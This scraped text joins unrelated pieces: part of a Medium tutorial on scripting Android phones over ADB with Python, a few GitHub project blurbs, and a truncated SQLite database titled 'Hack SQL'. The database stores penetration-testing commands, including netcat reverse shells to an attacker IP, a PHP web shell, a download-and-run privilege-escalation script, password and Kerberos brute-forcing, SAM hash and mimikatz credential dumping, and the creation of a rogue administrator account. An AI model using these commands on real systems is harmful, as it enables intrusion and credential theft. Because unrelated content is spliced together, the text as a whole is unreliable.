into our terminal window. Getting started Now that all the dependencies are installed, we can start up our ADB and connect our device. Firstly, connect your device to your PC with the USB cable, if USB debugging is enabled then a message should pop up asking if it is okay for your PC to control the device, simply answer yes. Then on your PC, open up a terminal window and start the ADB server by typing in adb start-server. This should print out the following messages: * daemon not running; starting now at tcp:5037 * daemon started successfully If you also installed scrcpy, then you can start that by just typing scrcpy into the terminal. However, this will only work if you added it to your path, otherwise you can open the executable by changing your terminal directory to the directory of where you installed scrcpy and typing scrcpy.exe. Hopefully if everything works out, you should be able to see your device on your PC and be able to control it using your mouse and keyboard. Now we can create a new python file and check if we can find our connected device using the library: Here we import the AdbClient class and create a client object using it. Then we can get a list of devices connected. Lastly, we get the first device out of our list (it is generally the only one there if there is only one device connected). The basics of writing scripts The main way we are going to interface with our device is using the shell, through this we can send commands to simulate a touch at a specific location or to swipe from A to B. To simulate screen touches (taps) we first need to work out how the screen coordinates work. To help with these we can activate the pointer location setting in the developer options. Once activated, wherever you touch on the screen, you can see that the coordinates for that point appear at the top. The coordinate system works like this: A diagram to show how the coordinate system works A diagram to show how the coordinate system works The top left corner of the display has the x and y coordinates (0, 0) respectively, and the bottom right corners’ coordinates are the largest possible values of x and y. Now that we know how the coordinate system works, we need to check out the different commands we can run. I have made a list of commands and how to use them below for quick reference: Input tap x y Input text “hello world!” Input keyevent eventID Here is a list of some common eventID’s: 3: home button 4: back button 5: call 6: end call 24: volume up 25: volume down 26: turn device on or off 27: open camera 64: open browser 66: enter 67: backspace 207: contacts 220: brightness down 221: brightness up 277: cut 278: copy 279: paste If you wanted to find more, here is a long list of them here. Creating a selfie timer Now we know what we can do, let’s start doing it. In this first example I will show you how to create a quick selfie timer. To get started we need to import our libraries and create a connect function to connect to our device: You can see that the connect function is identical to the previous example of how to connect to your device, except here we return the device and client objects for later use. In our main code, we can call the connect function to retrieve the device and client objects. From there we can open up the camera app, wait 5 seconds and take a photo. It’s really that simple! As I said before, this is simply replicating what you would usually do, so thinking about how to do things is best if you do them yourself manually first and write down the steps. Creating a definition searcher We can do something a bit more complex now, and that is to ask the browser to find the definition of a particular word and take a screenshot to save it on our computer. The basic flow of this program will be as such: 1. Open the browser 2. Click the search bar 3. Enter the search query 4. Wait a few seconds 5. Take a screenshot and save it But, before we get started, you need to find the coordinates of your search bar in your default browser, you can use the method I suggested earlier to find them easily. For me they were (440, 200). To start, we will have to import the same libraries as before, and we will also have our same connect method. In our main function we can call the connect function, as well as assign a variable to the x and y coordinates of our search bar. Notice how this is a string and not a list or tuple, this is so we can easily incorporate the coordinates into our shell command. We can also take an input from the user to see what word they want to get the definition for: We will add that query to a full sentence which will then be searched, this is so that we can always get the definition. After that we can open the browser and input our search query into the search bar as such: Here we use the eventID 66 to simulate the press of the enter key to execute our search. If you wanted to, you could change the wait timings per your needs. Lastly, we will take a screenshot using the screencap method on our device object, and we can save that as a .png file: Here we must open the file in the write bytes mode because the screencap method returns bytes representing the image. If all went according to plan, you should have a quick script which searches for a specific word. Here it is working on my phone: A GIF to show how the definition searcher example works on my phone A GIF to show how the definition searcher example works on my phone Final thoughts Hopefully you have learned something new today, personally I never even knew this was a thing before I did some research into it. The cool thing is, that you can do anything you normal would be able to do, and more since it just simulates your own touches and actions! I hope you enjoyed the article and thank you for reading! 💖 468 9 468 9 More from ITNEXT Follow ITNEXT is a platform for IT developers & software engineers to share knowledge, connect, collaborate, learn and experience next-gen technologies. Sabrina Amrouche Sabrina Amrouche ·Apr 15, 2021 Using the Spotify Algorithm to Find High Energy Physics Particles Python 5 min read Using the Spotify Algorithm to Find High Energy Physics Particles Wenkai Fan Wenkai Fan ·Apr 14, 2021 Responsive design at different levels in Flutter Flutter 3 min read Responsive design at different levels in Flutter Abhishek Gupta Abhishek Gupta ·Apr 14, 2021 Getting started with Kafka and Rust: Part 2 Kafka 9 min read Getting started with Kafka and Rust: Part 2 Adriano Raiano Adriano Raiano ·Apr 14, 2021 How to properly internationalize a React application using i18next React 17 min read How to properly internationalize a React application using i18next Gary A. Stafford Gary A. Stafford ·Apr 14, 2021 AWS IoT Core for LoRaWAN, AWS IoT Analytics, and Amazon QuickSight Lora 11 min read AWS IoT Core for LoRaWAN, Amazon IoT Analytics, and Amazon QuickSight Read more from ITNEXT Recommended from Medium Morpheus Morpheus Morpheus Swap — Resurrection Ashutosh Kumar Ashutosh Kumar GIT Branching strategies and GitFlow Balachandar Paulraj Balachandar Paulraj Delta Lake Clones: Systematic Approach for Testing, Sharing data Jason Porter Jason Porter Week 3 -Yieldly No-Loss Lottery Results Casino slot machines Mikolaj Szabó Mikolaj Szabó in HackerNoon.com Why functional programming matters Tt Tt Set Up LaTeX on Mac OS X Sierra Goutham Pratapa Goutham Pratapa Upgrade mongo to the latest build Julia Says Julia Says in Top Software Developers in the World How to Choose a Software Vendor AboutHelpTermsPrivacy Get the Medium app A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
MigVega / SLAM2REFThis project allows the alignment and correction of LiDAR-based SLAM session data with a reference map or another session, also the retrieval of 6-DoF poses with accuracy of up to 3 cm given an accurate TLS point cloud as a reference map (this map should be accurate at least regarding the position of permanent elements such as walls and columns).
rzou15 / Object Detection In Point Cloud Road BoundaryObject detection in Point Cloud is popular in HD Map and sensor-based autonomous driving. There basically four types of object you can obtain in daily scenario: road surface - contains painted lane marking and pavement area, support facility - contains road boundary (guardrail and curb), road sign, light pole, etc., uncorrelated object - for example, sidewalk, building, etc., and moving object - such like pedestrian, vehicle, bicycle, etc. In this project, please search references, design and prototype your road boundary (guardrail) detection algorithm.
Talentica / WifiIndoorPositioning:rocket: Evaluation of Location of the device using RSSI values of Access Points and Reference point which are made from Wi-Fi readings
Don-No7 / Hack SQL-- -- File generated with SQLiteStudio v3.2.1 on Sun Feb 7 14:58:28 2021 -- -- Text encoding used: System -- PRAGMA foreign_keys = off; BEGIN TRANSACTION; -- Table: Commands CREATE TABLE Commands (Command_No INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Name TEXT REFERENCES Programs (Name) NOT NULL, Description TEXT NOT NULL, Command TEXT, File BLOB); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (1, 'Kerbrute', 'brute single user password', 'kerbrute bruteuers [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (2, 'Kerbrute', 'brute username:password combos from file or stdin', 'kerbrute brutforce [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (3, 'Kerbrute', 'test a single password agains a list of users', 'kerbrute passwordspray [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (4, 'Kerbrute', 'Enumerate valid domain usernames via kerberos', 'kerbrute userenum [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (5, 'Name-That-Hash', 'Find the hash type of a string', 'nth --text ''<hash>''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (6, 'Name-That-Hash', 'Find the hash type of a file', 'nth --file <hash file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (7, 'Nmap', 'scan for vulnerabilites', 'nmap --script vuln <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (8, 'Nikto', 'Scan host for vulnerabilites', 'nikto -h <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (9, 'SMBClient', 'check for misconfigured anonymous login', 'smbclient -L \\\\<HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (10, 'Hydra', 'Brutforce a webpage looking for usernames', 'hydra -l <user wordlist> -p 123 <HOST_IP> http-post-form ''/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=<output string on failure>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (11, 'SMBMap', 'enumerates SMB file shares', 'smbmap -u <user> -p <pass> -H <host IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (12, 'WPScan', 'Enumerate Wordpress website', 'wpscan --url <wp site> --enumerate --plugins-detection', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (13, 'WPScan', 'enumerate though known usernames', 'wpscan --url <HOST_IP> --usernames <USERNAME_FOUND> --passwords wordlist.dic', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (14, 'PowerShell', 'bypass execution policy', 'powershell.exe -exec bypass', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (15, 'TheHarvester', 'gathering informaiton from online sources', 'theharvester -d <domain> -l <#> -g -b google', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (16, 'Netcat', 'open a listener', 'nc -lvnp <port #>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (17, 'Netcat', 'Connect to computer', 'nc <attacker ip> <attacker port>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (18, 'GoBuster', 'Eunmerate directories on a website with a cookie', 'gobuster dir -u http://<IP> -w <wordlist> -x <extention> -c PHPSESSID=<cookie val>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (19, 'SQLMap', 'map sql at an IP', 'sqlmap -r <IP> --batch --force-ssl', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (20, 'John the Ripper', 'Use wordlist to parse hash', 'john <HASHES_FILE> --wordlist=<wordlist>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (21, 'John the Ripper', 'unencrypt shadow file', 'john <Unshadowed passwds>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (22, 'Unshadow', 'combine /etc/passwd and /etc/shadow file for cracking', 'unshadow <passwd> <shadow>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (23, 'Hashcat', 'crack hashes with a wordlist', 'hashcat -m <hash type> -a 0 -o <output file> <hash file> <wordlist> --force', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (26, 'Enum4Linux', 'basic command', 'enum4linux -a <IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (27, 'SMBClient', 'connect to a SMB share', 'smbclinet //<IP>/<share> -U <username>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (28, 'Netcat', 'connect with shell (-e doest always work)', 'nc -e /bin/sh <ATTACKING-IP> 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (29, 'Netcat', 'connect with shell (-e doest always work)', '/bin/sh | nc ATTACKING-IP 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (30, 'Netcat', 'done on the target', 'rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (31, 'SQLMap', 'Check form for SQL injection', 'sqlmap -o -u "http://meh.com/form/" –forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (32, 'SQLMap', 'automated SQL scan', 'sqlmap -u <URL> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (33, 'CrackMapExec', 'run a mimikatz module', 'crackmapexec smb <target(s)> -u <username> -p <password> --local-auth -M mimikatz', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (34, 'CrackMapExec', 'Command execution', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' -x whoami', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (35, 'CrackMapExec', 'check logged in users', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' --lusers', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (36, 'CrackMapExec', 'dump local SAM hashes', 'crackmapexec <target(s)> -u ''<uesrname>'' -p ''<password>'' --local-auth --sam', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (37, 'CrackMapExec', 'null session login', 'crackmapexec smb <target(s)> -u '''' -p ''''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (38, 'CrackMapExec', 'list modules', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (39, 'CrackMapExec', 'pass the hash', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (41, 'IKE-Scan', 'attack pre shared key with dictionary', 'psk-crack -d </path/to/dictionary> <psk file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (42, 'IKE-Scan', 'If you find a SonicWALL VPN using agressive mode it will require a group id, the default group id is GroupVPN', 'ike-scan <IP> -A -id GroupVPN', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (43, 'IKE-Scan', 'to find aggressive mode VPNs and save for use with psk-crack', 'ike-scan <IP> -A -P<file out>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (44, 'John the Ripper', 'crack passwords with korelogic rules', 'for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file> ; done', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (45, 'Nmap', 'create a list of ip addresses ', 'nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (46, 'Linux commands', 'mount NFS share on linux', 'mount -t nfs server:/share /mnt/point', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (47, 'PowerShell', 'create new user', 'net user <username> <password> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (48, 'PowerShell', 'add user to a group (normaly Administrators)', 'net localgroup <group> <username> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (49, 'PSK-Crack', 'brute force with specified length and specified chars (if left blank default is 36)', 'psk-crack -b <#> --charset="<charlist>" <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (50, 'PSK-Crack', 'dictianary attack', 'psk-crack -d <file> <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (51, 'SQLMap', 'check form for SQL injection', 'sqlmap -o -u "<url of form>" --forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (52, 'SQLMap', 'Scan url for union + error based injection with mysql backend and use a random user agent + database dump', 'sqlmap -u "<form URL>?id=1>" --dbms=mysql --tech=U --random-agent --dump ', NULL); -- Table: Exploits CREATE TABLE Exploits (Target TEXT, Type TEXT, Criteria TEXT, Method TEXT, Code TEXT, Result TEXT, Notes TEXT); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Injection', 'ability to write to website folder', 'create or edit a mage of the website and insert the code to get remote access to the machine', '<? php system ($ _ GET [''cmd'']); ?>', 'execute code via url', '<URL of php>?cmd=<code to execue>'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'shell', 'enter code into the shell to find vulnerbilities int he machine', 'find / -perm -u=s -type f 2>/dev/null', 'SUID binaries', 'link output to GTFO bins and exploit'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Box', 'Priv Esc', 'Python binary running as root', 'generate a shell using python to grain root access', 'python3 -c "import pty;pty.spawn(''/bin/sh'');"', 'root shell', 'change pyton varibale acordingly'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('SQL', 'Priv Esc', 'MySQL binary running as root', 'enter into MySQL command line and break out into root y using the code', 'mysql> \! /bin/sh', 'get shell from root priv SQL', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'low privilage shell', 'use the code to search for programs that run as sudo without password', 'sudo -l', NULL, 'list programs that can be used with sudo and no password'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Windows', 'Priv Esc', 'Powershell', 'use code to enumerate priv esc opertunities', 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """', 'list of unquoted service paths that might be used for priv esc', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'LFI', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', NULL, 'use Linenum.sh to enumerate linux box', 'wget https://www.linenum.sh/ -P /dev/shm/Linenum.sh; chmod +x /dev/shm/linenum.sh ; ./dev/shm/Linenum.sh | tee /dev/shm/lininfo.txt', ' file, /dev/shm/lininfo.txt, with priv esc info', 'it is possible to use other methods of download like: curl or others found on google'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'No-Auth', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Re-Registration', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'JWT', 'a site that uses jSON as cookies', 'edit the information (with BURP) thats going to the website to gain access without authenitaction', NULL, NULL, NULL); -- Table: Programs CREATE TABLE Programs (Name text PRIMARY KEY NOT NULL UNIQUE, Stage TEXT, Description text, Info text, Features TEXT, Target TEXT, Offensive BOOLEAN, commands TEXT); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nmap', 'Enum', 'Used for scanning a network/host to gather more information', 'man pages on linux', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('BURP Suit', 'Enum, Exploit', 'A program for manipulating HTTP requests, enumeration and Exploit', 'https://portswigger.net/burp/documentation/contents', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Metasploit', 'All', 'Powerfull swiss-army-knife of hacking', 'https://docs.rapid7.com/metasploit/', NULL, 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('MSFVenom', 'Exploit', 'Designed for creating payloads', 'https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom', 'Payloads', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Snort', 'Utility', 'Packet sniffer', 'https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/249/original/snort_manual.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIXACIED2SPMSC7GA%2F20210128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210128T192737Z&X-Amz-Expires=172800&X-Amz-SignedHeaders=host&X-Amz-Signature=4b51dc730677d14203c4a4cde25c1831ac64e9eca8df89c6737701811fa3f9fd', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('GoBuster', 'Enum', 'A fuzzer for websites', 'man pages on linux', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hydra', 'Exploit', 'Brutforcer for wesite passwords', 'man pages on linux', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Mimikatz', 'Post', 'Used to exploit kerberos', 'https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Impacket', 'Exploit', 'The fascilitator of python bassed script that uses modules for attacking windows ', 'https://www.secureauth.com/labs-old/impacket/', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Enum4Linux', 'Enum', 'for Enumerating Windows and Samba hosts', 'man pages included, https://tools.kali.org/information-gathering/enum4linux', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Rubeus', 'Exploit', 'Used for kerberos interaction and abuse', 'https://github.com/GhostPack/Rubeus', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Kerbrute', 'Enum, Exploit', 'quickly enumerate and brutforce active directory accounts through kerberos pre-authentication', 'https://github.com/ropnop/kerbrute/', 'Brute', 'Windows', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('John the Ripper', 'Exploit', 'a password brutforcer', 'https://www.openwall.com/john/doc/', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hashcat', 'Exploit', 'A password bruteforces', 'http://manpages.org/hashcat', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Bloodhound', 'Enum', 'Network mapping tool', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Wireshark', 'Utility', 'Packet sniffer', 'https://www.wireshark.org/download/docs/user-guide.pdf', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hash-Identifier', 'Utility', '(superseeded by Name-That-Hash)A simple python program for identifying hashes', 'man pages on linux', NULL, 'Hash', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Scp', 'Utility', 'For transfering files over SSH connection', 'man pages on llinux', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBClient', 'Utility', 'Used to connect to SMB file shares, can be used to enumerate shares', 'man pages on linux', 'Connect', 'SMB', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PowerShell', 'Utility', 'Powerfull comand line for Windows', 'https://www.pdq.com/powershell/', NULL, 'Windows', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Searchsploit', 'Enum', 'Local version of ExploitDB', 'https://www.exploit-db.com/searchsploit', 'Exploit Enum', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Vim', 'Utiility', 'Text editor', 'https://vimhelp.org/', NULL, 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('LinPeas', 'Post', 'For Enumerating Linux computers', 'Simply run on a linux computer', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nikto', 'Enum', 'For full enumeration on websites', 'https://cirt.net/nikto2-docs/', 'Exploit Enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Radare2', 'Utility', 'A tooll used to reverse engineer programs', 'https://github.com/radareorg/radare2/blob/master/doc/intro.md', 'Reverse', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Evil-WinRM', 'Exploit', 'Malware exuivilent of WinRM and used to exploit windows systems', 'https://github.com/Hackplayers/evil-winrm', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Seatbelt', 'Post', 'Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives', 'https://github.com/GhostPack/Seatbelt', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WinPeas', 'Post', 'For full enumeration of windows host (internal)', 'https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Lockless', 'Post', 'LockLess is a C# tool that allows for the enumeration of open file handles and the copying of locked files', 'https://github.com/GhostPack/Lockless', 'File interaction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SQLMap', 'Exploit', 'Automates the process of detecting and exploiting SQL injection flaws and taking over of database servers', 'http://sqlmap.org/', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('KEETheif', 'Post', 'Allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system', 'https://github.com/GhostPack/KeeThief', 'File interacction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('TheHarvester', 'Enum', 'The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database', 'https://tools.kali.org/information-gathering/theharvester', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('jSQLInjection', 'Enum', 'used for gathering SQL databse information form a distant source', 'https://tools.kali.org/vulnerability-analysis/jsql', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hping', 'Enum', 'Ping command on steroids, used to enumerating firewalls', 'https://tools.kali.org/information-gathering/hping3', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux Exploit Suggester', 'Post', 'keeps track of vulnerabilities and suggests exploits to gain root access', 'https://tools.kali.org/exploitation-tools/linux-exploit-suggester', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unix-PrivEsc-Check', 'Post', ' It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps, written in a single shell script so is easy to upload', 'https://tools.kali.org/vulnerability-analysis/unix-privesc-check', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Dotdotpwn', 'Enum', 'It’s a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers', 'https://tools.kali.org/information-gathering/dotdotpwn', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Websploit', 'Enum, Exploit', 'Swiss-army-knife of web exploits ranging from social engineering to honeypots and everything in between', 'https://tools.kali.org/web-applications/websploit', NULL, 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('XSSer', 'Enum', 'To detect, exploit and report XSS vulnerabilities in web-based applications', 'https://tools.kali.org/web-applications/xsser', 'Exploit enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Name-That-Hash', 'Utility', 'Hash-identifier with more deatils and command line based', 'https://github.com/HashPals/Name-That-Hash', NULL, 'N/A', 'N', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBMap', 'Enum', 'enumerate shares over a domin', 'https://tools.kali.org/information-gathering/smbmap', 'Scanning', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Redis-Cli', 'Exploit', 'used for interacting and exploiting reddis-cli on port 6379', 'https://book.hacktricks.xyz/pentesting/6379-pentesting-redis ; https://redis.io/topics/rediscli', 'SQL', 'SQL', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unshadow', 'POST', 'Combining passwd and shadow files into 1', 'simply use: unshadow <passwd file> <shadow file> > <output file>', 'Passwords', 'Hash', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WPScan', 'Enum', 'Look for vulnerabilities in wordpress site', 'https://github.com/wpscanteam/wpscan', 'Scanning', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Netcat', 'Utility', 'used for connecting 2 computers', 'https://www.win.tue.nl/~aeb/linux/hh/netcat_tutorial.pdf', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux commands', 'Post', 'Linux commands used for Priv esc', 'https://gtfobins.github.io, https://wadcoms.github.io', 'Priv Esc', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CrackMapExec', 'Enum,, Exploit', 'Swis army knife of network testing', 'https://ptestmethod.readthedocs.io/en/latest/cme.html', 'Scanning, Exploit', 'Networks', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('IKE-Scan', 'Enum', 'Used to dicover, fingerprint and test 